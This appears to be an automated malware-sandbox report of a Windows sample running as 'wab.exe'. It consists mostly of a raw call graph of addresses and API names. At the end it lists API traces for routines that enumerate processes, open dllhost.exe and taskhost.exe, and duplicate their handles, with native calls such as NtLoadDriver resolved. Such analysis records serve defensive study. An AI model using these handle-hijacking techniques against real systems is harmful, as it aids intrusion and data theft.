GetWindowsDirectoryW wcscpy 39644->39662 39645 4139c9 wcscpy wcscat 39645->39647 39647->38703 39648 413a11 memcpy wcscat 39648->39647 39650 413cb0 GetModuleHandleW 39649->39650 39651 413cda 39649->39651 39650->39651 39652 413cbf GetProcAddress 39650->39652 39653 413ce3 GetProcessTimes 39651->39653 39654 413cf6 39651->39654 39652->39651 39653->38706 39654->38706 39656 413f2f 39655->39656 39657 413f54 39655->39657 39656->39631 39656->39632 39658 40a804 8 API calls 39657->39658 39659 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39658->39659 39659->39656 39660->39639 39661->39645 39662->39648 39663->38727 39664->38750 39666 409cf9 GetVersionExW 39665->39666 39667 409d0a 39665->39667 39666->39667 39667->38756 39667->38760 39668->38762 39669->38765 39670->38767 39671->38832 39673 40bba5 39672->39673 39720 40cc26 39673->39720 39676 40bd4b 39741 40cc0c 39676->39741 39681 40b2cc 27 API calls 39682 40bbef 39681->39682 39748 40ccf0 _wcsicmp 39682->39748 39684 40bbf5 39684->39676 39749 40ccb4 6 API calls 39684->39749 39686 40bc26 39687 40cf04 17 API calls 39686->39687 39688 40bc2e 39687->39688 39689 40bd43 39688->39689 39690 40b2cc 27 API calls 39688->39690 39691 40cc0c 4 API calls 39689->39691 39692 40bc40 39690->39692 39691->39676 39750 40ccf0 _wcsicmp 39692->39750 39694 40bc46 39694->39689 39695 40bc61 memset memset WideCharToMultiByte 39694->39695 39751 40103c strlen 39695->39751 39697 40bcc0 39698 40b273 27 API calls 39697->39698 39699 40bcd0 memcmp 39698->39699 39699->39689 39700 40bce2 39699->39700 39701 404423 37 API calls 39700->39701 39702 40bd10 39701->39702 39702->39689 39703 40bd3a LocalFree 39702->39703 39704 40bd1f memcpy 39702->39704 39703->39689 39704->39703 39705->38847 39707 409a74 GetTempFileNameW 39706->39707 39708 409a66 GetWindowsDirectoryW 39706->39708 39707->38846 39708->39707 39709->38884 39710->38884 39711->38884 39712->38884 39713->38884 39714->38884 39715->38884 39716->38884 39717->38884 39718->38859 39719->38881 39752 4096c3 CreateFileW 39720->39752 39722 40cc34 39723 40cc3d GetFileSize 39722->39723 39731 40bbca 39722->39731 39724 40afcf 2 API calls 39723->39724 39725 40cc64 39724->39725 39753 40a2ef ReadFile 39725->39753 39727 40cc71 39754 40ab4a MultiByteToWideChar 39727->39754 39729 40cc95 FindCloseChangeNotification 39730 40b04b ??3@YAXPAX 39729->39730 39730->39731 39731->39676 39732 40cf04 39731->39732 39733 40b633 ??3@YAXPAX 39732->39733 39734 40cf14 39733->39734 39760 40b1ab ??3@YAXPAX ??3@YAXPAX 39734->39760 39736 40bbdd 39736->39676 39736->39681 39737 40cf1b 39737->39736 39739 40cfef 39737->39739 39761 40cd4b 39737->39761 39740 40cd4b 14 API calls 39739->39740 39740->39736 39742 40b633 ??3@YAXPAX 39741->39742 39743 40cc15 39742->39743 39744 40aa04 ??3@YAXPAX 39743->39744 39745 40cc1d 39744->39745 39810 40b1ab ??3@YAXPAX ??3@YAXPAX 39745->39810 39747 40b7d4 memset CreateFileW 39747->38839 39747->38840 39748->39684 39749->39686 39750->39694 39751->39697 39752->39722 39753->39727 39755 40ab93 39754->39755 39756 40ab6b 39754->39756 39755->39729 39757 40a9ce 4 API calls 39756->39757 39758 40ab74 39757->39758 39759 40ab7c MultiByteToWideChar 39758->39759 39759->39755 39760->39737 39762 40cd7b 39761->39762 39795 40aa29 39762->39795 39764 40cef5 39765 40aa04 ??3@YAXPAX 39764->39765 39766 40cefd 39765->39766 39766->39737 39768 40aa29 6 API calls 39769 40ce1d 39768->39769 39770 40aa29 6 API calls 39769->39770 39771 40ce3e 39770->39771 39772 40ce6a 39771->39772 39803 40abb7 wcslen memmove 39771->39803 39773 40ce9f 39772->39773 39806 40abb7 wcslen memmove 39772->39806 39775 40a8d0 7 API calls 39773->39775 39778 40ceb5 39775->39778 39776 40ce56 39804 40aa71 wcslen 39776->39804 39785 40a8d0 7 API calls 39778->39785 39780 40ce8b 39807 40aa71 wcslen 39780->39807 39782 40ce5e 39805 40abb7 wcslen memmove 39782->39805 39783 40ce93 39808 40abb7 wcslen memmove 39783->39808 39787 40cecb 39785->39787 39809 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39787->39809 39789 40cedd 39790 40aa04 ??3@YAXPAX 39789->39790 39791 40cee5 39790->39791 39792 40aa04 ??3@YAXPAX 39791->39792 39793 40ceed 39792->39793 39794 40aa04 ??3@YAXPAX 39793->39794 39794->39764 39796 40aa33 39795->39796 39797 40aa63 39795->39797 39798 40aa44 39796->39798 39799 40aa38 wcslen 39796->39799 39797->39764 39797->39768 39800 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 39798->39800 39799->39798 39801 40aa4d 39800->39801 39801->39797 39802 40aa51 memcpy 39801->39802 39802->39797 39803->39776 39804->39782 39805->39772 39806->39780 39807->39783 39808->39773 39809->39789 39810->39747 39811->38899 39812->38907 37668 44dea5 37669 44deb5 FreeLibrary 37668->37669 37670 44dec3 37668->37670 37669->37670 39822 4148b6 FindResourceW 39823 4148cf SizeofResource 39822->39823 39826 4148f9 39822->39826 39824 4148e0 LoadResource 39823->39824 39823->39826 39825 4148ee LockResource 39824->39825 39824->39826 39825->39826 37847 415304 ??3@YAXPAX 39827 441b3f 39837 43a9f6 39827->39837 39829 441b61 40010 4386af memset 39829->40010 39831 44189a 39832 4418e2 39831->39832 39836 442bd4 39831->39836 39833 4418ea 39832->39833 40011 4414a9 12 API calls 39832->40011 39836->39833 40012 441409 memset 39836->40012 39838 43aa20 39837->39838 39839 43aadf 39837->39839 39838->39839 39840 43aa34 memset 39838->39840 39839->39829 39841 43aa56 39840->39841 39842 43aa4d 39840->39842 40013 43a6e7 39841->40013 40021 42c02e memset 39842->40021 39847 43aad3 40023 4169a7 11 API calls 39847->40023 39848 43aaae 39848->39839 39848->39847 39863 43aae5 39848->39863 39849 43ac18 39852 43ac47 39849->39852 40025 42bbd5 memcpy memcpy memcpy memset memcpy 39849->40025 39853 43aca8 39852->39853 40026 438eed 16 API calls 39852->40026 39857 43acd5 39853->39857 40028 4233ae 11 API calls 39853->40028 39856 43ac87 40027 4233c5 16 API calls 39856->40027 40029 423426 11 API calls 39857->40029 39861 43ace1 40030 439811 163 API calls 39861->40030 39862 43a9f6 161 API calls 39862->39863 39863->39839 39863->39849 39863->39862 40024 439bbb 22 API calls 39863->40024 39865 43acfd 39870 43ad2c 39865->39870 40031 438eed 16 API calls 39865->40031 39867 43ad19 40032 4233c5 16 API calls 39867->40032 39869 43ad58 40033 44081d 163 API calls 39869->40033 39870->39869 39873 43add9 39870->39873 40037 423426 11 API calls 39873->40037 39874 43ae3a memset 39875 43ae73 39874->39875 40038 42e1c0 147 API calls 39875->40038 39876 43adab 40035 438c4e 163 API calls 39876->40035 39877 43ad6c 39877->39839 39877->39876 40034 42370b memset memcpy memset 39877->40034 39881 43adcc 40036 440f84 12 API calls 39881->40036 39882 43ae96 40039 42e1c0 147 API calls 39882->40039 39885 43aea8 39886 43aec1 39885->39886 40040 42e199 147 API calls 39885->40040 39887 43af00 39886->39887 40041 42e1c0 147 API calls 39886->40041 39887->39839 39891 43af1a 39887->39891 39892 43b3d9 39887->39892 40042 438eed 16 API calls 39891->40042 39897 43b3f6 39892->39897 39901 43b4c8 39892->39901 39893 43b60f 39893->39839 40101 4393a5 17 API calls 39893->40101 39896 43af2f 40043 4233c5 16 API calls 39896->40043 40083 432878 12 API calls 39897->40083 39899 43af51 40044 423426 11 API calls 39899->40044 39907 43b4f2 39901->39907 40089 42bbd5 memcpy memcpy memcpy memset memcpy 39901->40089 39903 43af7d 40045 423426 11 API calls 39903->40045 40090 43a76c 21 API calls 39907->40090 39908 43b529 40091 44081d 163 API calls 39908->40091 39909 43b462 40085 423330 11 API calls 39909->40085 39910 43af94 40046 423330 11 API calls 39910->40046 39914 43afca 40047 423330 11 API calls 39914->40047 39915 43b47e 39919 43b497 39915->39919 40086 42374a memcpy memset memcpy memcpy memcpy 39915->40086 39916 43b544 39920 43b55c 39916->39920 40092 42c02e memset 39916->40092 39917 43b428 39917->39909 40084 432b60 16 API calls 39917->40084 40087 4233ae 11 API calls 39919->40087 40093 43a87a 163 API calls 39920->40093 39922 43afdb 40048 4233ae 11 API calls 39922->40048 39927 43b56c 39931 43b58a 39927->39931 40094 423330 11 API calls 39927->40094 39928 43b4b1 40088 423399 11 API calls 39928->40088 39930 43afee 40049 44081d 163 API calls 39930->40049 40095 440f84 12 API calls 39931->40095 39932 43b4c1 40097 42db80 163 API calls 39932->40097 39937 43b592 40096 43a82f 16 API calls 39937->40096 39940 43b5b4 40098 438c4e 163 API calls 39940->40098 39942 43b5cf 40099 42c02e memset 39942->40099 39944 43b005 39944->39839 39948 43b01f 39944->39948 40050 42d836 163 API calls 39944->40050 39945 43b1ef 40060 4233c5 16 API calls 39945->40060 39948->39945 40058 423330 11 API calls 39948->40058 40059 42d71d 163 API calls 39948->40059 39949 43b212 40061 423330 11 API calls 39949->40061 39951 43b087 40051 4233ae 11 API calls 39951->40051 39952 43add4 39952->39893 40100 438f86 16 API calls 39952->40100 39955 43b22a 40062 42ccb5 11 API calls 39955->40062 39958 43b23f 40063 4233ae 11 API calls 39958->40063 39959 43b10f 40054 423330 11 API calls 39959->40054 39961 43b257 40064 4233ae 11 API calls 39961->40064 39965 43b129 40055 4233ae 11 API calls 39965->40055 39966 43b26e 40065 4233ae 11 API calls 39966->40065 39969 43b09a 39969->39959 40052 42cc15 19 API calls 39969->40052 40053 4233ae 11 API calls 39969->40053 39970 43b282 40066 43a87a 163 API calls 39970->40066 39972 43b13c 40056 440f84 12 API calls 39972->40056 39974 43b29d 40067 423330 11 API calls 39974->40067 39977 43b15f 40057 4233ae 11 API calls 39977->40057 39978 43b2af 39979 43b2b8 39978->39979 39980 43b2ce 39978->39980 40068 4233ae 11 API calls 39979->40068 40069 440f84 12 API calls 39980->40069 39984 43b2c9 40071 4233ae 11 API calls 39984->40071 39985 43b2da 40070 42370b memset memcpy memset 39985->40070 39988 43b2f9 40072 423330 11 API calls 39988->40072 39990 43b30b 40073 423330 11 API calls 39990->40073 39992 43b325 40074 423399 11 API calls 39992->40074 39994 43b332 40075 4233ae 11 API calls 39994->40075 39996 43b354 40076 423399 11 API calls 39996->40076 39998 43b364 40077 43a82f 16 API calls 39998->40077 40000 43b370 40078 42db80 163 API calls 40000->40078 40002 43b380 40079 438c4e 163 API calls 40002->40079 40004 43b39e 40080 423399 11 API calls 40004->40080 40006 43b3ae 40081 43a76c 21 API calls 40006->40081 40008 43b3c3 40082 423399 11 API calls 40008->40082 40010->39831 40011->39833 40012->39836 40014 43a6f5 40013->40014 40015 43a765 40013->40015 40014->40015 40102 42a115 40014->40102 40015->39839 40022 4397fd memset 40015->40022 40019 43a73d 40019->40015 40020 42a115 147 API calls 40019->40020 40020->40015 40021->39841 40022->39848 40023->39839 40024->39863 40025->39852 40026->39856 40027->39853 40028->39857 40029->39861 40030->39865 40031->39867 40032->39870 40033->39877 40034->39876 40035->39881 40036->39952 40037->39874 40038->39882 40039->39885 40040->39886 40041->39886 40042->39896 40043->39899 40044->39903 40045->39910 40046->39914 40047->39922 40048->39930 40049->39944 40050->39951 40051->39969 40052->39969 40053->39969 40054->39965 40055->39972 40056->39977 40057->39948 40058->39948 40059->39948 40060->39949 40061->39955 40062->39958 40063->39961 40064->39966 40065->39970 40066->39974 40067->39978 40068->39984 40069->39985 40070->39984 40071->39988 40072->39990 40073->39992 40074->39994 40075->39996 40076->39998 40077->40000 40078->40002 40079->40004 40080->40006 40081->40008 40082->39952 40083->39917 40084->39909 40085->39915 40086->39919 40087->39928 40088->39932 40089->39907 40090->39908 40091->39916 40092->39920 40093->39927 40094->39931 40095->39937 40096->39932 40097->39940 40098->39942 40099->39952 40100->39893 40101->39839 40103 42a175 40102->40103 40105 42a122 40102->40105 40103->40015 40108 42b13b 147 API calls 40103->40108 40105->40103 40106 42a115 147 API calls 40105->40106 40109 43a174 40105->40109 40133 42a0a8 147 API calls 40105->40133 40106->40105 40108->40019 40123 43a196 40109->40123 40124 43a19e 40109->40124 40110 43a306 40110->40123 40153 4388c4 14 API calls 40110->40153 40113 42a115 147 API calls 40113->40124 40115 43a642 40115->40123 40157 4169a7 11 API calls 40115->40157 40119 43a635 40156 42c02e memset 40119->40156 40123->40105 40124->40110 40124->40113 40124->40123 40134 42ff8c 40124->40134 40142 415a91 40124->40142 40146 4165ff 40124->40146 40149 439504 13 API calls 40124->40149 40150 4312d0 147 API calls 40124->40150 40151 42be4c memcpy memcpy memcpy memset memcpy 40124->40151 40152 43a121 11 API calls 40124->40152 40126 4169a7 11 API calls 40127 43a325 40126->40127 40127->40115 40127->40119 40127->40123 40127->40126 40128 42b5b5 memset memcpy 40127->40128 40129 42bf4c 14 API calls 40127->40129 40132 4165ff 11 API calls 40127->40132 40154 42b63e 14 API calls 40127->40154 40155 42bfcf memcpy 40127->40155 40128->40127 40129->40127 40132->40127 40133->40105 40158 43817e 40134->40158 40136 42ff99 40137 42ffe3 40136->40137 40138 42ffd0 40136->40138 40141 42ff9d 40136->40141 40163 4169a7 11 API calls 40137->40163 40162 4169a7 11 API calls 40138->40162 40141->40124 40143 415a9d 40142->40143 40144 415ab3 40143->40144 40145 415aa4 memset 40143->40145 40144->40124 40145->40144 40312 4165a0 40146->40312 40149->40124 40150->40124 40151->40124 40152->40124 40153->40127 40154->40127 40155->40127 40156->40115 40157->40123 40159 438187 40158->40159 40161 438192 40158->40161 40164 4380f6 40159->40164 40161->40136 40162->40141 40163->40141 40166 43811f 40164->40166 40165 438164 40165->40161 40166->40165 40169 437e5e 40166->40169 40192 4300e8 memset memset memcpy 40166->40192 40193 437d3c 40169->40193 40171 437eb3 40171->40166 40172 437ea9 40172->40171 40177 437f22 40172->40177 40208 41f432 40172->40208 40175 437f06 40255 415c56 11 API calls 40175->40255 40179 437f7f 40177->40179 40180 432d4e 3 API calls 40177->40180 40178 437f95 40256 415c56 11 API calls 40178->40256 40179->40178 40181 43802b 40179->40181 40180->40179 40183 4165ff 11 API calls 40181->40183 40184 438054 40183->40184 40219 437371 40184->40219 40187 43806b 40188 438094 40187->40188 40257 42f50e 138 API calls 40187->40257 40191 437fa3 40188->40191 40258 4300e8 memset memset memcpy 40188->40258 40191->40171 40259 41f638 104 API calls 40191->40259 40192->40166 40194 437d69 40193->40194 40197 437d80 40193->40197 40260 437ccb 11 API calls 40194->40260 40196 437d76 40196->40172 40197->40196 40198 437da3 40197->40198 40200 437d90 40197->40200 40201 438460 134 API calls 40198->40201 40200->40196 40264 437ccb 11 API calls 40200->40264 40204 437dcb 40201->40204 40202 437de8 40263 424f26 123 API calls 40202->40263 40204->40202 40261 444283 13 API calls 40204->40261 40206 437dfc 40262 437ccb 11 API calls 40206->40262 40209 41f54d 40208->40209 40215 41f44f 40208->40215 40210 41f466 40209->40210 40294 41c635 memset memset 40209->40294 40210->40175 40210->40177 40215->40210 40217 41f50b 40215->40217 40265 41f1a5 40215->40265 40290 41c06f memcmp 40215->40290 40291 41f3b1 90 API calls 40215->40291 40292 41f398 86 API calls 40215->40292 40217->40209 40217->40210 40293 41c295 86 API calls 40217->40293 40295 41703f 40219->40295 40221 437399 40222 43739d 40221->40222 40224 4373ac 40221->40224 40302 4446ea 11 API calls 40222->40302 40225 416935 16 API calls 40224->40225 40226 4373ca 40225->40226 40227 438460 134 API calls 40226->40227 40232 4251c4 137 API calls 40226->40232 40236 415a91 memset 40226->40236 40239 43758f 40226->40239 40251 437584 40226->40251 40254 437d3c 135 API calls 40226->40254 40303 425433 13 API calls 40226->40303 40304 425413 17 API calls 40226->40304 40305 42533e 16 API calls 40226->40305 40306 42538f 16 API calls 40226->40306 40307 42453e 123 API calls 40226->40307 40227->40226 40228 4375bc 40230 415c7d 16 API calls 40228->40230 40231 4375d2 40230->40231 40233 4442e6 11 API calls 40231->40233 40253 4373a7 40231->40253 40232->40226 40234 4375e2 40233->40234 40234->40253 40310 444283 13 API calls 40234->40310 40236->40226 40308 42453e 123 API calls 40239->40308 40242 4375f4 40245 437620 40242->40245 40246 43760b 40242->40246 40244 43759f 40247 416935 16 API calls 40244->40247 40249 416935 16 API calls 40245->40249 40311 444283 13 API calls 40246->40311 40247->40251 40249->40253 40251->40228 40309 42453e 123 API calls 40251->40309 40252 437612 memcpy 40252->40253 40253->40187 40254->40226 40255->40171 40256->40191 40257->40188 40258->40191 40259->40171 40260->40196 40261->40206 40262->40202 40263->40196 40264->40196 40266 41bc3b 101 API calls 40265->40266 40267 41f1b4 40266->40267 40268 41edad 86 API calls 40267->40268 40275 41f282 40267->40275 40269 41f1cb 40268->40269 40270 41f1f5 memcmp 40269->40270 40271 41f20e 40269->40271 40269->40275 40270->40271 40272 41f21b memcmp 40271->40272 40271->40275 40273 41f326 40272->40273 40276 41f23d 40272->40276 40274 41ee6b 86 API calls 40273->40274 40273->40275 40274->40275 40275->40215 40276->40273 40277 41f28e memcmp 40276->40277 40279 41c8df 56 API calls 40276->40279 40277->40273 40278 41f2a9 40277->40278 40278->40273 40281 41f308 40278->40281 40282 41f2d8 40278->40282 40280 41f269 40279->40280 40280->40273 40283 41f287 40280->40283 40284 41f27a 40280->40284 40281->40273 40288 4446ce 11 API calls 40281->40288 40285 41ee6b 86 API calls 40282->40285 40283->40277 40286 41ee6b 86 API calls 40284->40286 40287 41f2e0 40285->40287 40286->40275 40289 41b1ca memset 40287->40289 40288->40273 40289->40275 40290->40215 40291->40215 40292->40215 40293->40209 40294->40210 40296 417044 40295->40296 40297 41705c 40295->40297 40299 416760 11 API calls 40296->40299 40301 417055 40296->40301 40298 417075 40297->40298 40300 41707a 11 API calls 40297->40300 40298->40221 40299->40301 40300->40296 40301->40221 40302->40253 40303->40226 40304->40226 40305->40226 40306->40226 40307->40226 40308->40244 40309->40228 40310->40242 40311->40252 40317 415cfe 40312->40317 40321 415d23 __aullrem __aulldvrm 40317->40321 40324 41628e 40317->40324 40318 4163ca 40331 416422 11 API calls 40318->40331 40320 416172 memset 40320->40321 40321->40318 40321->40320 40322 416422 10 API calls 40321->40322 40323 415cb9 10 API calls 40321->40323 40321->40324 40322->40321 40323->40321 40325 416520 40324->40325 40326 416527 40325->40326 40330 416574 40325->40330 40327 416544 40326->40327 40326->40330 40332 4156aa 11 API calls 40326->40332 40329 416561 memcpy 40327->40329 40327->40330 40329->40330 40330->40124 40331->40324 40332->40327 40364 41493c EnumResourceNamesW 37672 4287c1 37673 4287d2 37672->37673 37674 429ac1 37672->37674 37675 428818 37673->37675 37676 42881f 37673->37676 37691 425711 37673->37691 37686 425ad6 37674->37686 37742 415c56 11 API calls 37674->37742 37709 42013a 37675->37709 37737 420244 97 API calls 37676->37737 37681 4260dd 37736 424251 120 API calls 37681->37736 37683 4259da 37735 416760 11 API calls 37683->37735 37689 422aeb memset memcpy memcpy 37689->37691 37690 429a4d 37692 429a66 37690->37692 37696 429a9b 37690->37696 37691->37674 37691->37683 37691->37689 37691->37690 37694 4260a1 37691->37694 37705 4259c2 37691->37705 37708 425a38 37691->37708 37725 4227f0 memset memcpy 37691->37725 37726 422b84 15 API calls 37691->37726 37727 422b5d memset memcpy memcpy 37691->37727 37728 422640 13 API calls 37691->37728 37730 4241fc 11 API calls 37691->37730 37731 42413a 90 API calls 37691->37731 37738 415c56 11 API calls 37692->37738 37734 415c56 11 API calls 37694->37734 37697 429a96 37696->37697 37740 416760 11 API calls 37696->37740 37741 424251 120 API calls 37697->37741 37700 429a7a 37739 416760 11 API calls 37700->37739 37705->37686 37729 415c56 11 API calls 37705->37729 37708->37705 37732 422640 13 API calls 37708->37732 37733 4226e0 12 API calls 37708->37733 37710 42014c 37709->37710 37713 420151 37709->37713 37752 41e466 97 API calls 37710->37752 37712 420162 37712->37691 37713->37712 37714 4201b3 37713->37714 37715 420229 37713->37715 37716 4201b8 37714->37716 37717 4201dc 37714->37717 37715->37712 37718 41fd5e 86 API calls 37715->37718 37743 41fbdb 37716->37743 37717->37712 37721 4201ff 37717->37721 37749 41fc4c 37717->37749 37718->37712 37721->37712 37724 42013a 97 API calls 37721->37724 37724->37712 37725->37691 37726->37691 37727->37691 37728->37691 37729->37683 37730->37691 37731->37691 37732->37708 37733->37708 37734->37683 37735->37681 37736->37686 37737->37691 37738->37700 37739->37697 37740->37697 37741->37674 37742->37683 37744 41fbf1 37743->37744 37745 41fbf8 37743->37745 37748 41fc39 37744->37748 37767 4446ce 11 API calls 37744->37767 37757 41ee26 37745->37757 37748->37712 37753 41fd5e 37748->37753 37750 41ee6b 86 API calls 37749->37750 37751 41fc5d 37750->37751 37751->37717 37752->37713 37755 41fd65 37753->37755 37754 41fdab 37754->37712 37755->37754 37756 41fbdb 86 API calls 37755->37756 37756->37755 37758 41ee41 37757->37758 37759 41ee32 37757->37759 37768 41edad 37758->37768 37771 4446ce 11 API calls 37759->37771 37762 41ee3c 37762->37744 37765 41ee58 37765->37762 37773 41ee6b 37765->37773 37767->37748 37777 41be52 37768->37777 37771->37762 37772 41eb85 11 API calls 37772->37765 37774 41ee70 37773->37774 37775 41ee78 37773->37775 37833 41bf99 86 API calls 37774->37833 37775->37762 37778 41be6f 37777->37778 37779 41be5f 37777->37779 37785 41be8c 37778->37785 37798 418c63 37778->37798 37812 4446ce 11 API calls 37779->37812 37782 41be69 37782->37762 37782->37772 37783 41bee7 37783->37782 37816 41a453 86 API calls 37783->37816 37785->37782 37785->37783 37786 41bf3a 37785->37786 37789 41bed1 37785->37789 37815 4446ce 11 API calls 37786->37815 37788 41bef0 37788->37783 37791 41bf01 37788->37791 37789->37788 37792 41bee2 37789->37792 37790 41bf24 memset 37790->37782 37791->37790 37793 41bf14 37791->37793 37813 418a6d memset memcpy memset 37791->37813 37802 41ac13 37792->37802 37814 41a223 memset memcpy memset 37793->37814 37797 41bf20 37797->37790 37801 418c72 37798->37801 37799 418c94 37799->37785 37800 418d51 memset memset 37800->37799 37801->37799 37801->37800 37803 41ac52 37802->37803 37804 41ac3f memset 37802->37804 37807 41ac6a 37803->37807 37817 41dc14 19 API calls 37803->37817 37805 41acd9 37804->37805 37805->37783 37809 41aca1 37807->37809 37818 41519d 37807->37818 37809->37805 37810 41acc0 memset 37809->37810 37811 41accd memcpy 37809->37811 37810->37805 37811->37805 37812->37782 37813->37793 37814->37797 37815->37783 37817->37807 37821 4175ed 37818->37821 37829 417570 SetFilePointer 37821->37829 37824 41760a ReadFile 37825 417637 37824->37825 37826 417627 GetLastError 37824->37826 37827 4151b3 37825->37827 37828 41763e memset 37825->37828 37826->37827 37827->37809 37828->37827 37830 4175b2 37829->37830 37831 41759c GetLastError 37829->37831 37830->37824 37830->37827 37831->37830 37832 4175a8 GetLastError 37831->37832 37832->37830 37833->37775 37834 417bc5 37835 417c61 37834->37835 37840 417bda 37834->37840 37836 417bf6 UnmapViewOfFile CloseHandle 37836->37836 37836->37840 37838 417c2c 37838->37840 37846 41851e 20 API calls 37838->37846 37840->37835 37840->37836 37840->37838 37841 4175b7 37840->37841 37842 4175d6 FindCloseChangeNotification 37841->37842 37843 4175c8 37842->37843 37844 4175df 37842->37844 37843->37844 37845 4175ce Sleep 37843->37845 37844->37840 37845->37842 37846->37838 39813 4147f3 39816 414561 39813->39816 39815 414813 39817 41456d 39816->39817 39818 41457f GetPrivateProfileIntW 39816->39818 39821 4143f1 memset _itow WritePrivateProfileStringW 39817->39821 39818->39815 39820 41457a 39820->39815 39821->39820

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                  APIs
                  • memset.MSVCRT ref: 0040DDAD
                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                  • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                    • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                  • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                  • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                  • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                  • _wcsicmp.MSVCRT ref: 0040DEB2
                  • _wcsicmp.MSVCRT ref: 0040DEC5
                  • _wcsicmp.MSVCRT ref: 0040DED8
                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                  • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                  • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                  • memset.MSVCRT ref: 0040DF5F
                  • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                  • _wcsicmp.MSVCRT ref: 0040DFB2
                  • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.1848311193.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                  Similarity
                  • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                  • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                  • API String ID: 594330280-3398334509
                  • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                  • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                  • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                  • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 FindCloseChangeNotification 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 643 413eb7-413ebd 641->643 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 645 413ec8-413eda call 4099f4 643->645 646 413ebf-413ec6 ??3@YAXPAX@Z 643->646 648 413edb-413ee2 645->648 646->648 656 413ee4 648->656 657 413ee7-413efe 648->657 662 413ea2-413eae CloseHandle 650->662 654 413e61-413e68 651->654 655 413e37-413e44 GetModuleHandleW 651->655 654->650 658 413e6a-413e76 654->658 655->654 660 413e46-413e5c GetProcAddress 655->660 656->657 657->638 658->650 660->654 662->641
                  APIs
                    • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
